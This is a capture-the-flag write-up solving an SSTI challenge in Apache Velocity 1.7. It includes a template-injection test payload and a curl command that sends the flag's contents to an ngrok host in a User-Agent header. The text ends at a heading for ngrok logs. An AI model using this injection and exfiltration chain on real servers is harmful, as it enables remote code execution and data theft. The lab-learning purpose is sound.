Labyrinth Linguist Writeup
Cyber Apocalypse 2024
Solved by : thewhiteh4t
- In this challenge we have a translation service
- Upon inspecting source files, we noticed few things :
- flag file is partially randomized in
entrypoint.sh
- flag file is partially randomized in
mv /flag.txt /flag$(cat /dev/urandom | tr -cd "a-f0-9" | head -c 10).txt
- In
pom.xmlwe can see the dependencies and their version information :
<parent>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-parent</artifactId>
<version>1.5.10.RELEASE</version>
</parent>
<dependencies>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
</dependency>
<dependency>
<groupId>org.apache.velocity</groupId>
<artifactId>velocity</artifactId>
<version>1.7</version>
</dependency>
<dependency>
<groupId>org.apache.velocity</groupId>
<artifactId>velocity</artifactId>
<version>1.7</version>
</dependency>
</dependencies>
- Velocity v1.7 is vulnerable to SSTI attack
- References :
https://antgarsil.github.io/posts/velocity/ https://iwconnect.com/apache-velocity-server-side-template-injection/ - Based on the PoC above we ran the test case
#set ($run=1 + 1) $run
- RCE was blind because we had no output of the commands so we used
ngrokfor getting a callback to confirm if the payload was working - Then we tried reverse shells but none of them worked for some reason so we thought to simplify we can make it download a file
- And since the command output was not visible we used web requests to exfiltrate the flag by setting custom user agent in curl command
> cat pwn
curl "https://f084-116-74-26-67.ngrok-free.app/special" -H "User-Agent: $(cat /flag*)"
- After sending the file we send a second request to run it using :
sh pwn
- Web logs in ngrok dashboard :
